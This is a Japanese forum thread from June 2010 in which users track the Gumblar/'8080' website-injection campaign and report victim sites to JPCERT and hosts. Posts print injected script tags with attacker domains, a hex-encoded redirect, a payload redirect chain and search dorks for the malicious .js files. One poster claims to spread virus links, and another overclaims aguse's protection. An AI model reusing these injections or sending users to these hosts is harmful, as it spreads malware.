URLリンク(wiki)●higaitaisaku●com/wiki.cgi?page=%B0%AD%BC%C1%A5%EF%A5%F3%A5%AF%A5%EA%A5%C3%A5%AF%BA%BE%B5%BD%A5%B5%A5%A4%A5%C8%A4%CE%A5%B9%A5%D1%A5%A4%A5%A6%A5%A7%A5%A2
693:名無しさん@お腹いっぱい。
10/06/11 22:51:11
>>690
気にする必要ないと思われ
694:名無しさん@お腹いっぱい。
10/06/11 22:54:49
>>690
おれもそのファイルできてたけど
中に誰もいませんよ
695:名無しさん@お腹いっぱい。
10/06/12 01:02:42
URLリンク(www.macromedia.com)
いつのまにFlashにP2P機能がついたんだよ
696:名無しさん@お腹いっぱい。
10/06/12 02:09:20
【感染が確認された大手企業一部】
・JR東日本 ・ホンダ ・ローソン ・京王電鉄 ・小林製薬 ・ハウス食品
・ラジオ関西 ・洋菓子販売のモロゾフ など多数
697:fusianasam
10/06/12 08:39:17
test
698:名無しさん@お腹いっぱい。
10/06/12 11:25:06
>>695
去年の9月くらいに気がついたんだけど
yimg.jpとかのFLASHでUPnPにアクセスしてたわ
今までは勝手にルーターのポート開放してたのか
699:名無しさん@お腹いっぱい。
10/06/12 14:29:01
これってFireFox のオプションの詳細、一般の中のアクセシビリティの
Web ページの自動転送、再読み込み禁止で警告させることは
出来ないのでしょうか
700:名無しさん@お腹いっぱい。
10/06/12 15:42:00
>>680
URLリンク(blog.trendmicro.co.jp)
701:名無しさん@お腹いっぱい。
10/06/12 16:11:38
22 名前:(○口○*)さん 投稿日:10/06/12 15:43 ID:h5XAfxXp0
kazoeru■com
誤爆すんなksg
702:名無しさん@お腹いっぱい。
10/06/12 16:24:38
ただでさえバグが多いFlash、いままではネットマーク周りはブラウザ依存だったからよかったものの、
P2P機能がついたりストリーミング機能ついたりして直接ネットワークアクセスなんてされたら、
どんなバグが潜んでるかかわからん
703:名無しさん@お腹いっぱい。
10/06/12 17:18:40
>>695
なにそれこわい…
>>701
URLリンク(www.virustotal.com)
AviraとKasperskyに検体を提出、返事待ち
704:名無しさん@お腹いっぱい。
10/06/12 17:37:38
>>702
しかも更新はせざるを得ない、しかし更新してもP2Pでポートに穴開けられる
どっちに進んでもPC詳しくない一般人には地獄だなコレ
705:名無しさん@お腹いっぱい。
10/06/12 17:40:33
>>695のパネルで「常に拒否」にしたんだけど、それでOK?今後も何かしないと
穴開けられる可能性あるのかな。
706:名無しさん@お腹いっぱい。
10/06/12 17:55:34
いっそflashplayerをアンインスコするのも手だと思うんだ
多少不便にはなるかもしれないがセキュリティにはかえられない
707:コテハン ◆8080adndqg
10/06/12 18:05:06
【陥落サイトのURL悪用厳禁】
www3●pf-x●net/~lau ←絶賛放置中
8080のコードがぶった斬られて
<script type="text/javascript" src="http~中略~.js"></script>
なんだこれ?
www●creativeholic●sakura●ne●jp/creativeholic/ ←web屋 カスがw
ここにも<script type="text/javascript" src="http~中略~.js"></script>
houritusoudan●net/
やっぱり<script type="text/javascript" src="http~中略~.js"></script>が入ってる
708:コテハン ◆8080adndqg
10/06/12 18:10:13
連投スマソ
【陥落サイトのURL悪用厳禁】
www●aoyamabc-online●com/
↓
</html>
<script type="text/javascript" src="http~中略~.js"></script>
<!--06f0d0ddde5fbe2387a6bdb4452f234a-->
8080がコードを変更した可能性あり。
709:コテハン ◆8080adndqg
10/06/12 18:34:37
【陥落サイトのURL悪用厳禁】
www●hekimen-ryokuka●com/rss/index●php ←今までのやつ
www●7500zei●com/ ←例のHP更新代行業者
↓
</html>
<script type="text/javascript" src="http~中略~.js"></script>
<!--d2392c04537c5eaf61fe86d1998535a1-->
katusika●net/base/
↓
<script type="text/javascript" src="http~中略~.js"></script>
<!--7e388d5d98d4fbb4bc9eb21bd27c9815-->
710:名無しさん@お腹いっぱい。
10/06/12 18:49:19
>>706
利便性と両立できないようなセキュリティ対策はゴミだよ。
711:名無しさん@お腹いっぱい。
10/06/12 19:12:49
llife●sakura●ne●jp/fubo/kyuusyuukonnkatu/
712:コテハン ◆8080adndqg
10/06/12 20:03:21
【陥落サイトのURL悪用厳禁】
新型8080(?)っぽいやつ
<script type="text/javascript" src="http~中略~.js"></script>
<!--32文字の英数字-->
↓
canyonhardware●com
d-pic●net/repo/index●html ←絶賛放置中のとこ
電話用のサイトだが・・・
no9-bbs●appspot●com/687474703A2F2F6770696E64792E636F6D2F30312F31392
コードがHEXされとるのがあった
713:名無しさん@お腹いっぱい。
10/06/12 20:37:30
>>710
動画サイト見ないやつはべつにいいだろ
714:コテハン ◆8080adndqg
10/06/12 20:57:42
>712
訂正
no9-bbs●appspot●com/687474703A2F2F6770696E64792E636F6D2F30312F31392F
末尾のFが脱落してたorz
715:名無しさん@お腹いっぱい。
10/06/12 23:34:16
>>713
コンテンツをフラッシュ内リンクでしか表示しないクソサイトも結構多いんだ。
見なくて済むなら即Uターンなんだが、施設の予約とかどうしようもなかったり、
特にウェザーニューズがな…。
716:あんちたった ◆MOTO.0SDfQ
10/06/13 00:10:09
>>715
アレのウザさは半端無いよね。
HTML版も作れや!って感じだよね
717:名無しさん@お腹いっぱい。
10/06/13 01:49:01
acl-musicのURLをGredで覗いて大爆笑w
あそこは色々な意味で期待を裏切りません
いろいろ忙しくて報告が遅れちゃったので詳細は端折りますけど、
>>701-714までにあるURLは報告済みの反応待ち
これからチェックしようと思ったんですが、Gredがちょっとご機嫌斜め
うまくいかないもんですねえ…
718:コテハン ◆8080adndqg
10/06/13 04:09:23
>>717 乙乙
【陥落サイトのURL悪用厳禁】
tw13●net/vogue/S-MX/index●html ←相変わらず絶賛放置中
8080のコードが途中でぶった斬られて
↓
<script type="text/javascript" src="http://blog●bigsophieblog●com/OCR●js"></script>
<!--b8bc4160235ef97212335c7af60aeda7-->
houritusoudan●net/
↓
<script type="text/javascript" src="http://blog●bigsophieblog●com/Finder●js"></script>
<!--3edc66f8132dfa1d633ac8c343d2e74e-->
謎の新型の飛び先は
blog●bigsophieblog●com/~.js
sogpaoiy●the-mlmpowercall●com/~.js
この2つに集中してるみたい(現時点では)
お馴染みの激しい難読化されたやつ
shabao●com/public_html/top_footer ←既出だったかな?
www●saihu-shop●com/rss/index●php
あきた(から)ねる・・
719:名無しさん@お腹いっぱい。
10/06/13 16:30:21
ここの人たちって
どうやって感染サイト探してるの?
虱潰し?
とにかくすごいね
720:名無しさん@お腹いっぱい。
10/06/13 16:38:49
コードで検索
721:名無しさん@お腹いっぱい。
10/06/13 16:43:16
>>720
なるほど
722:名無しさん@お腹いっぱい。
10/06/13 16:45:56
「Adobe AIR 2」正式版公開、高速化やOSとの連携強化、セキュリティ修正も
URLリンク(internet.watch.impress.co.jp)
これはAdobe AIRにもFlashゼロデイ攻撃の脆弱性が含まれてたということだよな
723:名無しさん@お腹いっぱい。
10/06/13 17:00:08
アドビは本当にやる気無いな
ゼロデイ状態でも一月くらい平気で待たすし
724:名無しさん@お腹いっぱい。
10/06/13 17:33:35
document.write('<s'+'cript type="text/javascript" src="[URL]"></scr'+'ipt>');
さっそく弄ってきたw
725:名無しさん@お腹いっぱい。
10/06/13 17:35:27
>>718
新型avast!反応しないね(´・ω・`)
726:名無しさん@お腹いっぱい。
10/06/13 17:48:45
というか.jsの中身がcom:8080だと今更気付いた
727:名無しさん@お腹いっぱい。
10/06/13 18:38:48
>>725
新型はリダイレクト先が
blog●bigsophieblog●com/
sogpaoiy●the-mlmpowercall●com/
この2つに集約されてるから、hostsファイルで簡単に蹴れる
ドメインが増えたら抜けちゃうけどなw
728:名無しさん@お腹いっぱい。
10/06/13 20:40:59
>>723
市場独占してるからってふんぞり返って
世界に流通してるソフトのセキュリティを疎かにするってのは
世界中にウイルスを広がらせて打撃を与えてるってのと同義なのにね
ウイルスばらまく連中と大差ない、むしろ一般人にはクリーンを装ってる分それ以上か
729:名無しさん@お腹いっぱい。
10/06/13 21:05:50
アメリカ人が損賠請求しないかな
730:名無しさん@お腹いっぱい。
10/06/13 23:57:20
スレリンク(hiphop板:536番)
スレリンク(campus板:105番)
スレリンク(cchara板:877番)
スレリンク(wcomic板:521番)
スレリンク(soccer板:701番)
スレリンク(sec板:571番)
スレリンク(nhk板:51番)
↑悪用が収まらないので感染中のURL晒すのは止めたらいかがですか?
ウイルスばらまく連中に利用されてるように思います
731:名無しさん@お腹いっぱい。
10/06/14 00:16:26
2chで外部URLがあったらブラクラ・ウイルスだと思ってください
そして、このスレはちゃんと鯖管に通報したりしてますよね
>>730のリンクのスレにこのスレのリンクを貼って
対策を促せばいいんじゃないでしょうか
732:名無しさん@お腹いっぱい。
10/06/14 00:48:39
>>730
「自己責任」という言葉はご存知無いのでしょうかネ?
>>656が書いてるように、2ちゃんねるの使い方&注意 URLリンク(info.2ch.net) には
>被害を未然に防止するためには、むやみにURLをクリックせず (中略) 転んでも泣かない。。。
貼ってあるURLを疑いもせず、いきなり踏むほうにも問題があります。
>>640も書いてますね。
取説をしっかり読んでから文句を言って下さい。
踏まされて悔しかったら、涙を拭いて…クリーンインストール後に>>4を実施しましょう。
因みに、URLリンク(gw.aguse.jp) を通せば、何が仕掛けられていてもPCには影響が無いので覚えておいて下さい。
aguseはブックマーク推奨ですよ。
733:名無しさん@お腹いっぱい。
10/06/14 01:43:23
>>730
つ「鏡」
734:名無しさん@お腹いっぱい。
10/06/14 13:12:03
昔から提示されたURLホイホイ踏むのはアホのやる事って言われてたしな
踏むものがブラクラからウイルスに変わっただけ
735:名無しさん@お腹いっぱい。
10/06/14 13:58:57
www●maizurusou●co●jp/equip/index●html
だが、SonicWallのゲートウェイAVがGumlar_7として反応する。
しかし、ソースをみてもそれらしきものがみあたらん。
ちなみにウイルスバスターも反応しない。
SonicWall抜きでアクセスしても飛ばされた様子もない。
やられてますかね?
736:名無しさん@お腹いっぱい。
10/06/14 14:06:36
どこに目を付けてんだ
フレームしか無いシンプルなトップにおもいっきりあるじゃんか
737:735
10/06/14 14:21:02
>>736
ありがとう。逝ってきます・・
一応電凸しておいた。
「またでいすか?」という反応だった。
738:名無しさん@お腹いっぱい。
10/06/14 19:00:57
●com:8080キター
www●yosegi●jp
739:名無しさん@お腹いっぱい。
10/06/14 20:07:54
>>730
お前いいかげん、うぜえよ
740:名無しさん@お腹いっぱい。
10/06/15 00:41:08
複数サイト管理してるんだが、そのうち1つが改竄されてた。
で、その鯖缶のサイトトップが改竄されてたようなんだが、これは自分は感染してないと見てOK?
741:名無しさん@お腹いっぱい。
10/06/15 01:34:21
>>740
とりあえずスキャンしろ
742:夷塚 ◆y0JEaK6O/gDf
10/06/15 02:43:36
コテは好きじゃないけど仕方ないか…
>>740
不安に思ったら迷わずスキャンしたほうがいいですよ
それほど手間の掛かる作業でもありませんしね
>>735
メル凸しておきましたと事後報告
Gredで覗いた限りでは綺麗になってますね
>>738
メル凸しました
ついでにJPCERTに報告、Aviraに検体提出済み
743:名無しさん@お腹いっぱい。
10/06/15 08:13:56
www●kobesaito●com
これも8080系
744:名無しさん@お腹いっぱい。
10/06/15 10:31:30
そういや最近のGumblerだと対策せず感染したページ見たらウイルスをなすりつけてくるページに飛ばされるのかな?
それともウイルス自体埋め込みだから「感染した!」って解らない?
後者なら恐ろし過ぎるな、普段見てるページすら安心して出歩けないじゃん
過去ログ見る限りレジストリまで弄らないと対策不十分とまで言われるみたいだし
そこまで徹底しないとダメなんじゃあ今も感染が広がるのも納得
745:名無しさん@お腹いっぱい。
10/06/15 10:47:41
>>727
検索して飛んだサイトから
そのドメインにリダイレクトされてびびったわ
FWでブロックしてたから接続されなかったけど
746:夷塚 ◆y0JEaK6O/gDf
10/06/15 11:47:50
>>743
さくらインターネット、JPCERTに報告しました
747:名無しさん@お腹いっぱい。
10/06/15 13:22:45
>>744
> そういや最近のGumblerだと対策せず感染したページ見たらウイルスをなすりつけてくるページに飛ばされるのかな?
前のを知ってるならレス見てればわかると思うけど変わってないよ
レジストリまで確認しなきゃいけないのは稀な例で一般的にはそこまで必要ない
だいたいハンパなJREが入っていることの方が多い
サイト管理者が感染しても仕方ないという理由にはならないね
748:名無しさん@お腹いっぱい。
10/06/15 13:53:13
artsplanet●biz
com:8080な件
749:名無しさん@お腹いっぱい。
10/06/15 14:54:55
>>747
そのJREがコンパネで消しただけじゃダメだからアレなんじゃないの?
感染するのはホームページ持ってるユーザーだけじゃないし、
一般人にはコンパネで消した後も残骸が残ってる、しかも残ってる場所が1つの誤削除でPC動かなくなるかもしれないレジストリなんて予想だにせんよ
750:名無しさん@お腹いっぱい。
10/06/15 15:10:59
>>749
一部のメーカー製PCだけプリインストールされてる古いバージョンが消せないってだけで
通常はそんなのないです
751:名無しさん@お腹いっぱい。
10/06/15 15:43:06
GENOにかかってるか不安な奴はここを見てみ
このサイトのカーソルを当ててなくても波紋が出るならアウト
危険なサイトじゃない安心しろ一応
URLリンク(www.geocities.jp)
752:名無しさん@お腹いっぱい。
10/06/15 15:46:01
>>750
通常は、って言ったところで対象にはあるじゃん
プリインストール版はコンパネで消して、見た目は消えてても消した事にならないとか書いてないから被害広がってるところあるんじゃね?
ホントに根絶やしにしたいならそういうところもテンプレ徹底しなくちゃ
753:名無しさん@お腹いっぱい。
10/06/15 16:47:52
んなレアケースのことなんざどうでもいいよ
どうしてもってならお前がテンプレ作れ
754:夷塚 ◆y0JEaK6O/gDf
10/06/15 17:29:42
>>748
さくらインターネット、JPCERTに報告済み
Aviraに検体を提出しました
URLリンク(yamagata.int21h.jp)
こんなツールあったんですね
755:名無しさん@お腹いっぱい。
10/06/15 18:00:20
>>752
自己防衛が目的であって根絶やしなんていう非現実的なものは目標ではないんだけど
テンプレおねがいしますね
756:名無しさん@お腹いっぱい。
10/06/15 19:20:27
>>754
すごいけど、3月から更新無いね
現在のものには無力じゃないかな?
757:コテハン ◆8080adndqg
10/06/15 20:03:40
>>754 乙乙
--
URLリンク(www.google.co.jp)
色々試したけど、まったく釣れない・・orz
758:夷塚 ◆y0JEaK6O/gDf
10/06/16 04:57:20
>>756
サイト構成やリンク先、スクリプトの一覧を一気に把握できるので、
意外と使い方次第かもしれない…とか思ってみたり
>>757
お疲れ様です、検索ワードが苦戦のほどを物語ってますね…
こちらもほぼお手上げ状態、何か良い方法はないものか
759:名無しさん@お腹いっぱい。
10/06/16 07:10:12
bingで検索したほうがいいよ
760:名無しさん@お腹いっぱい。
10/06/16 16:15:55
www■4gamer■net/
4亀やられてる?
761:夷塚 ◆y0JEaK6O/gDf
10/06/16 16:30:27
ウイルス対策ソフトが反応しました?
762:名無しさん@お腹いっぱい。
10/06/16 16:36:25
___
|___ミ⌒ヽペタン
| ⌒)ノ ペタン
._ノ ) ((
| .・∀| ( 嘘ヽ
|__| | ̄ ̄ ̄|
/ > . | |
""""""""""""""""""""
763:名無しさん@お腹いっぱい。
10/06/16 17:10:03
>>760
gredとAguseは無反応
Dan's View Sourceで見る限りあやしいコードは無さそうだけど?
あと、ここは鑑定スレじゃない
764:名無しさん@お腹いっぱい。
10/06/16 19:02:30
じゃあそういう類の鑑定スレがあるのか……と言われるとな
結局Gumblerスレあるのここだけだし
初心者もここにすがるしかないんよね
765:名無しさん@お腹いっぱい。
10/06/16 19:04:17
勇気がなくて踏めないURL鑑定スレin初質 Part41
スレリンク(qa板)
ここでいいじゃん
766:760
10/06/16 21:06:27
>>761-765
8080フィルタが誤爆してただけだった
ホントすみません、4亀さんもすみませんでした
767:名無しさん@お腹いっぱい。
10/06/16 23:16:48
感染の確認方法がないのが痛い。
不安ならアンインストールw
768:名無しさん@お腹いっぱい。
10/06/16 23:51:32
>>767
怪しい確認方法よりスキャンのがはるかに良い
769:名無しさん@お腹いっぱい。
10/06/17 03:33:11
ノートンゴーストで4日前に戻した
これでウィルスなくなってる?
770:名無しさん@お腹いっぱい。
10/06/17 07:34:59
クリーンインスコとか普通なら最終手段なのにな
出現からもうすぐで一年になるのに感染したらこれしかないとか・・・
771:名無しさん@お腹いっぱい。
10/06/17 08:07:27
感染しているかどうかはどこで判断すればいいの?
772:('д') ◆yUyb3Tqn92
10/06/17 08:25:47
>>730
( ´,дゝ`)俺様こそがまさにウィルス貼りまくってる張本人だがなにか文句でも?
まるでこのスレの住人が同罪みたいな言いようだが、正確には共犯者なのだお( ´,дゝ`)ウフ
それにお前のような奴がいるからやめられねぇ「踏ませ」はな('д')v
773:('д') ◆yUyb3Tqn92
10/06/17 08:26:42
>>771
テンプレをよーーく見たまえ
チェックするところ沢山あるから
ニパ('д^)-☆
774:('д') ◆yUyb3Tqn92
10/06/17 08:30:25
特に>>2で探すのが一番確実な方法ですね。
はい。調子に乗り乗りな気分です。
次スレでも同じことをするつもりです。
このスレの削除依頼出した奴、無駄な努力お疲れ。
('д')調子に乗り乗りの気分です('д')
775:名無しさん@お腹いっぱい。
10/06/17 08:52:44
そういやaguseだと何処見れば対象のページがGumbler感染してるって教えてくれるんだろう
Gredは単純に「危険です」で教えてくれるんだろうけど、aguseは見るところ多すぎてゴチャゴチャでワケワカメ
776:('д') ◆yUyb3Tqn92
10/06/17 09:39:15
やべぇえええええ
(*'д'*)最近心がとても穏やかだぜ俺!!
悪意を持って悪をなしてたのに最近は天使のような心で悪をなしているお!!!
('`д´')こ!このままでは!天使になってしまうではないかー!
777:('д') ◆yUyb3Tqn92
10/06/17 09:39:56
さて
新宿VIPクリスタル行ってこよっと( 'д')
778:名無しさん@お腹いっぱい。
10/06/17 09:56:45
>>775
確かにわかりにくいよね
779:名無しさん@お腹いっぱい。
10/06/17 22:35:52
>>771
アンチウィルスソフトにドライブバイダウンロード用のダウンローダが検出されたら
780:名無しさん@お腹いっぱい。
10/06/17 22:39:36
ドライブバイダウンロード用のダウンローダがどこのフォルダに作成されたかが分かればいいのだがなあ
781:名無しさん@お腹いっぱい。
10/06/17 23:11:08
>>775
取得画像の下にGumbler感染してる可能背がありますってでるぞ
782:名無しさん@お腹いっぱい。
10/06/17 23:31:52
>>780
そういうのは一時的にわかったとしても
1時間後には変更されてるかもしれないから意味がない
783:名無しさん@お腹いっぱい。
10/06/18 08:58:32
www.value-2han●com
784:名無しさん@お腹いっぱい。
10/06/18 11:09:59
取扱注意
www●sakaue-farm●co●jp
農業IT化したらウィルス(害虫)にやられてたでござる
785:夷塚 ◆y0JEaK6O/gDf
10/06/18 15:05:55
>>783
www●aguse●jp/?m=w&url=www●value-2han●com
> Trojan.JS.Iframe.mi
> temp●hbsouthmomsclub●com:8080/Website●js
警察庁に通報しました
>>784
www●aguse●jp/?m=w&url=www●sakaue-farm●co●jp
メル凸に反応した様でござる、「403 Forbidden」
[補足]
www●value-2han●com
URLリンク(www.virustotal.com)
(com:8080/.jsを落とせず…aguse判定ではサイト消失っぽい)
↓
zbestfilm●net/media/kal/index●php
URLリンク(www.virustotal.com)
↓
id40478●srvdata●ru/mif●js
URLリンク(www.virustotal.com)
786:名無しさん@お腹いっぱい。
10/06/18 17:08:26
取扱注意
www●dord●co●jp
深海調査のエキスパートねぇ…
787:夷塚 ◆y0JEaK6O/gDf
10/06/18 18:11:54
>>786
よく見つけてきますねえ…
メル凸済み、JPCERTに報告、反応待ち
788:八頭 ◆YAGApwSaEw
10/06/18 22:01:30
>>夷塚さん
お疲れ様
リアルタイムで危険性を痛感している方が指摘する、「オープンなやりとりは危険を伴う」という意見にも頷けるので
僕はここを「無いよりはマシな程度」の存在にすぎないと思ってます(早い話が必要無い派です)
789:夷塚 ◆y0JEaK6O/gDf
10/06/19 05:39:37
>>787は、探すのが面倒なcom:8080を幾つも発掘している事に驚いている、
という意味で書いたのですが、読み返すと日本語おかしいですね
気が緩んでいたかな…申し訳ありません
>>788
まさか八頭氏からご指名とは驚きました
俺は「必要なくなる日が来るといいなあ」以上の事は考えてませんよ
790:名無しさん@お腹いっぱい。
10/06/19 12:16:04
レス削除なかなかされないねぇ
このスレのテンプレ見て踏んで被害者が増えない事を祈るのみ
あと運営仕事しろ
791:コテハン ◆8080adndqg
10/06/19 14:28:12
【陥落サイトのURL悪用厳禁】
www●leclat●net/blog/
792:コテハン ◆8080adndqg
10/06/19 15:03:56
>>789
確かに面倒なのでs・・orz
URLリンク(www.google.co.jp)
+OR+%22Default.js%22+OR+%22Del.icio.us.js%22+OR+%22Finder.js%22+OR+%22Gigahertz.js%22+OR+%22Gnutella.js%22
URLリンク(www.google.co.jp)
Kbps.js%22+OR+%22Kibibyte.js%22+OR+%22Link.js%22+OR+%22Name_Server.js%22+OR+%22Null.js%22+OR+%22OASIS.js%22+OR+%22Open_Source.js%22
URLリンク(www.google.co.jp)
+OR+%22Scrolling.js%22+OR+%22Tag.js%22+OR+%22Telnet.js%22
URLリンク(www.google.co.jp)
Video_Card.js%22+OR+%22Webmaster.js%22+OR+%22Website.js%22+OR+%22Web_Page.js%22+OR+%22XML.js%22+OR+%22Yahoo.js%22
※「長い行ががが」と叱られたから、てきとーなとこで改行してありま。
あきた(から)ねる..
793:夷塚 ◆y0JEaK6O/gDf
10/06/19 17:36:09
>>791
メル凸済み、反応待ち
794:名無しさん@お腹いっぱい。
10/06/19 21:52:23
www●itecjapan●co●jp/js/jQuery●js
末尾のdocument.writeがそうだと思う
795:名無しさん@お腹いっぱい。
10/06/19 22:24:10
www17●ocn●ne●jp/~pss/
796:名無しさん@お腹いっぱい。
10/06/19 22:56:37
www6●ocn●ne●jp/~mikajima/
797:夷塚 ◆y0JEaK6O/gDf
10/06/20 00:00:41
>>794
>>795
JPCERT、IPAに報告しました
>>796
スクリプトが見当たりません…探し方が悪いのかな
798:名無しさん@お腹いっぱい。
10/06/20 00:55:56
>>797
センセイに聞くと
「このサイトはコンピュータに損害を与える可能性があります。」
ソースにそれっぽいのが無いから修正済かも・・
799:名無しさん@お腹いっぱい。
10/06/20 13:55:12
Last-Modified: Sat, 19 Jun 2010 09:10:53 GMT
修正したんだろね。
800:名無しさん@お腹いっぱい。
10/06/21 12:29:07
Flash Playerの脆弱性を悪用、改ざんサイト訪問でウイルス感染の危険
URLリンク(internet.watch.impress.co.jp)
二匹目のドジョウ狙いらしい
801:名無しさん@お腹いっぱい。
10/06/21 20:38:26
スポーツ報知や日刊スポーツの
ttp○//as○sr○impact-ad○jp/hserver/
ってJavaScriptがあやしい・・・
802:名無しさん@お腹いっぱい。
10/06/21 21:45:30
>>801
www.google.co.jp/search?q=%22impact-ad.jp%22
広告のようだけど、あやしいってのは具体的に?
アクセスしてみる限りは、ウェブ改竄の不正コードはない
>>800
国内サイトは十数件ぐらいやられたかんじ
www.google.co.jp/search?lr=lang_ja&q=%22in/yahoo.js%22&num=50
803:名無しさん@お腹いっぱい。
10/06/21 22:01:00
>>802
801だが 1つの記事見てる間にクリック音が何回か鳴って
IE8左上の戻るサイト一覧のところにttp○//as○sr○impact-ad○jp/hserver・・・
があったからどうしたのかと思って
MSEでフルスキャンしたら何もウイルスは見つからなかった
804:名無しさん@お腹いっぱい。
10/06/21 23:26:12
>>803
トラッキングクッキーに反応しただけだと思わr
805:名無しさん@お腹いっぱい。
10/06/22 11:09:45
普段見てるページも感染してるんじゃないかって思って日々aguseで石橋を叩く日々だ
DELLで買った奴だからプリインストール版入ってて、コンパネで消したけど不安だよ
ここには対処法は「削除用外部ソフトウェアインスコでおk」で片づけられてるし……
初見には外部ソフトウェアは怖い
806:名無しさん@お腹いっぱい。
10/06/22 13:27:39
取扱注意
www●akuriru●jp
見た感じは8080っぽくないけど、jsファイルが危険すぎワロタ
Web_Page.js \(^o^)/
807:名無しさん@お腹いっぱい。
10/06/22 16:03:06
Javaを完全にアンインストしたいならJavaRa使えば?
808:名無しさん@お腹いっぱい。
10/06/22 16:49:29
とりあえず砂箱通してウェブ見てるけど
これも絶対じゃないからなぁ
809:名無しさん@お腹いっぱい。
10/06/22 17:17:20
>>805
aguseはスルーもあるよ
810:名無しさん@お腹いっぱい。
10/06/22 17:45:13
Chromeブラウザ、Flashに続いてPDFもプラグイン統合
URLリンク(journal.mycom.co.jp)
関係ないか…
811:名無しさん@お腹いっぱい。
10/06/22 17:49:13
URLリンク(docs.google.com)
これみたいなもんだろ?
812:名無しさん@お腹いっぱい。
10/06/22 17:53:26
>>809
確かgredもスルーするよな、ウイルスの特性上普段見てるサイトが次の日感染してて……なんてこともあり得るわけだから
恐ろしいったらありゃしない
>>807
外部ソフトウェアわざわざ使わなきゃいけないってのが不安なんだよ……
「プリインストールはコンパネで削除だけじゃむだ」と言って理由を聞かれると「レジストリに残骸が~」といつもあいまいに返して、その残骸の詳細はまったく出てこない
813:名無しさん@お腹いっぱい。
10/06/22 17:59:05
>>811
簡易型のリーダーがプラグインとしてインスコされてた。
IEで開くよりは軽い気がする。
814:名無しさん@お腹いっぱい。
10/06/22 18:02:31
>>813
ほうほう、Chrome OSに向けて着々と機能増やしてるね
815:名無しさん@お腹いっぱい。
10/06/22 18:35:31
>>812
そもそもDELLにも残骸残ることが確定なの?
あれはNECの一部だけじゃないの?
相当古い機種じゃなきゃあんな変なプリインストールなくね?
816:名無しさん@お腹いっぱい。
10/06/22 18:46:40
>>815
「残骸が残る」としか過去に言われてないからそこまで解らないんだ
そもそも残骸がどんなのか、どこにあるのか、regedit.exeで見たらどう映るのか
ただ「残骸あるある」だけでそこから先が全く話に出てないから……
817:名無しさん@お腹いっぱい。
10/06/22 18:52:58
>>816
それっぽい単語でレジストリ検索してもでないならどうしようもなくね
そんな見えないもんに震えてないでDELLのサポートにでも聞けばいいんじゃないの
818:名無しさん@お腹いっぱい。
10/06/22 19:03:43
>>817
期限切れた、アンインスコ済み、そもそも「それっぽい単語」ってのも初見にはサッパリ……
過去ログ読んで知ってそうな「残骸あるある」さんのログ見てもホントに「残骸あるよ」「メーカ品は残骸ある」のゴリ押しだけだし……
819:名無しさん@お腹いっぱい。
10/06/22 19:49:34
>>818
javaくらい思いつかないか?
レジストリじゃなくてもとりあえずjava.exeをファイル検索してみる程度はやったの?
調べる気もなく過剰に心配してるだけならPC捨てるのが一番安全だよ
しかもDELLってだけで他の情報は隠蔽されてるから調べようがない
そもそも本当にそれはプリインストールされていたの?
この方法でOS入れなおせば余計なソフトははいらないっぽいけどどうなんだろ
URLリンク(supportapj.dell.com)
820:名無しさん@お腹いっぱい。
10/06/22 21:36:49
スレの過去ログ読んでもググっても解らないからこそ書いてるのに「調べる気もない」「PC捨てれば?」だなんて……
とりあえずjava.exe検索したらwindows\system32とprogramfile\jre6\binに一つずつあった
どっちも作成日時は2010/04/16だった
821:名無しさん@お腹いっぱい。
10/06/22 21:45:36
すいません、検索しなおすとc\i386にも入っていました……
こちらは2005/11/10です
822:名無しさん@お腹いっぱい。
10/06/22 21:48:02
なかようせえへんねんやったらもうピコピコこうたらへんで
823:名無しさん@お腹いっぱい。
10/06/22 21:53:31
>>806
>>792
因みに、akuriru●jpは再発だw
渡辺司法書士はこっそり修正後、告知しないで隠蔽かにゃ?
search●yahoo●co●jp/search?p=%22●com%3A8080%2FWebmaster●js%22&ei=UTF-8&fr=top_ga1_sa&x=wrt&meta=fl%3D3
824:名無しさん@お腹いっぱい。
10/06/22 21:58:21
akuriru●jp
こっそりなおしてる
825:名無しさん@お腹いっぱい。
10/06/23 02:47:36
>>820
以下は通常JREインストールで入るjava.exe
> windows\system32とprogramfile\jre6\bin
java.exeを右クリック→プロパティからバージョンは確認できる
日付も新しいようだしまだこれはインストールされてるんじゃね
c\i386はリカバリ領域かなんかじゃないかと
826:名無しさん@お腹いっぱい。
10/06/23 08:33:52
>>825
アドバイスありがとうございます
そちらの二つは両方とも「6.0.200.2」と最新でした
c\386は「5.0.60.5」でしたが、ググってみるとクリーンインストール用CDの予備みたいなものだと判明
実影響は無いようなので、実質プリインストールの残骸は無い、と見ても大丈夫ですか?
827:名無しさん@お腹いっぱい。
10/06/23 14:35:45
>>826
ここで大丈夫と言っても何の保証もないんであとは自分で判断してください
828:名無しさん@お腹いっぱい。
10/06/23 18:16:55
ipatukouta●altervista●org/php5/
829:名無しさん@お腹いっぱい。
10/06/23 23:51:35
>828
多重トラップ注意
830:名無しさん@お腹いっぱい。
10/06/24 01:30:24
>>3
>まず、感染したかどうかは>>2のチェッカーで確認しましょう
これはどういう意味なのでしょうか?
>>2のリンク先をクリックすれば良いのですか?
831:名無しさん@お腹いっぱい。
10/06/24 02:28:14
テンプレ罠だらけだから
832:名無しさん@お腹いっぱい。
10/06/24 02:42:27
>>830
>>4よめ
感染したかについてはスキャンしてなにか出てきたら当たりかもしれない
833:名無しさん@お腹いっぱい。
10/06/24 08:25:34
もうセキュリティー板は、質問すること自体が誤った行為だとつくづく思いました。
自分で調べるのが一番。
834:名無しさん@お腹いっぱい。
10/06/24 09:34:43
やっと理解したか
おめでとう
835:名無しさん@お腹いっぱい。
10/06/24 12:03:35
コングラッチュレーション
,―==7 Congratulation! コングラッチュレーション
|く ___ _> Congratulation!
fll`ーU+'
`''、 ー=| おめでとう・・・・・・・・!
_,,..-´:|ヽー-;ー..,,_
. ,-=-, ,,..-‘≡≡:| ><´|≡::|ヽ おめでとう・・・・・・・・! おめでとう・・・・・・・・!
. | l____ヽ.|≡l≡≡≡| |::| |≡:::/::|
. |(llー´_ヽ|≡|≡≡≡|.|:::|l≡::/::::| おめでとう・・・・・・・・・・・・!
.. 4 l__`=|_|≡:|≡≡≡::||:::|'≡/≡|
/|\,.・|::≡:|ヽ|≡≡≡≡≡:::/|≡::| _,,.........、
≡|/}:ヽ|:≡|::::|{≡≡≡≡≡:::{ .|≡::| ヽ_,, ヽ
≡:| |:::|l≡:|≡|:|≡≡≡≡≡:::|. .|≡::| /_> |
:::≡l|:::|'≡:|≡:|::|≡≡≡≡≡:::|. .|≡::| |7 llう.. |
≡≡≡≡/|≡ヽ≡≡≡≡≡::::|. ..|≡::|. z-..,〃、 ム__ ll´.. |
